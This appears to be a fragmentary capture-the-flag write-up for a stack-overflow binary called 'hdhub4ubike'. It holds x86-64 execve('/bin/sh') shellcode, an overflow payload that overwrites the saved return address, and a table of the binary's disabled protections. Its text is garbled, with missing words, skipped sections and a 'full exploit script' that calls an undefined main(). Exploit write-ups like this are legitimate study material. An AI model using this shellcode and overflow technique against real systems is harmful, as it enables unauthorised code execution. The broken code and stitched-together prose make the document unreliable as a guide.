Hdhub4ubike
```c
/* ---------------------------------------------------- */
int check_key(const char *key)
    // key must be exactly 0x30 bytes long
    if (strlen(key) != 0x30) return 0;

    // compare with a secret stored in the .rodata section
    if (strcmp(key, secret_key) != 0) return 0;
```

```c
puts(flag); return 0;
```

Therefore we want our to be 0x004011a6.

3.2 Crafting the payload

The stack layout (simplified) at the moment of the overflow:

```python
# 32‑byte execve("/bin/sh") shellcode (x86‑64)
shellcode = (
    b"\x48\x31\xd2"                                # xor rdx, rdx
    b"\x48\x31\xf6"                                # xor rsi, rsi
    b"\x48\xbf\x2f\x62\x69\x6e\x2f\x73\x68\x00"    # movabs rdi, "/bin/sh"
    b"\x57"                                        # push rdi
    b"\x48\x89\xe7"                                # mov rdi, rsp
    b"\xb0\x3b"                                    # mov al, 0x3b
    b"\x0f\x05"                                    # syscall
)

payload = b'A'*64 + b'B'*8 + struct.pack("<Q", 0x7fffffffe000)  # address of our buffer (approx)
payload = payload.ljust(0x100, b'\x90') + shellcode
```

Running the payload spawns an interactive shell on the remote target.

| Topic | What we observed in hdhub4ubike |
|---------------------------|-----------------------------------|
| Stack overflow | read with a length far larger than the buffer → classic overflow vector. |
| Non‑PIE binaries | Fixed addresses make ROP/simple return‑to‑code trivial. |
| NX disabled | Allows injection of raw shellcode on the stack. |
| No canary / RELRO | Nothing blocks overwriting the saved RIP. |
| Info leakage | The flag was embedded in the binary – a “cheat” that encourages bypassing logic checks. |
| Best exploitation path | Return‑to‑existing puts that already has the flag address set → shortest payload, no need for ROP chain or shellcode. |

6️⃣ Full Exploit Script (Python 3)

```python
#!/usr/bin/env python3
import struct, pexpect, sys

BIN = "./hdhub4ubike"
TARGET_ADDR = 0x004011a6  # address of the "puts" call that prints the flag

if __name__ == "__main__":
    main()
```

Running the script prints the flag instantly: